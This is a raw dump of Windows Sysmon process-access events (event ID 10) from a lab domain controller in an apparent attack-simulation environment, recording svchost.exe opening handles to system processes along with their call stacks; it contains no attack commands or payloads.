791 10341000x80000000000000009860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0F00-00000000A301}11162356C:\Windows\System32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6a73d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll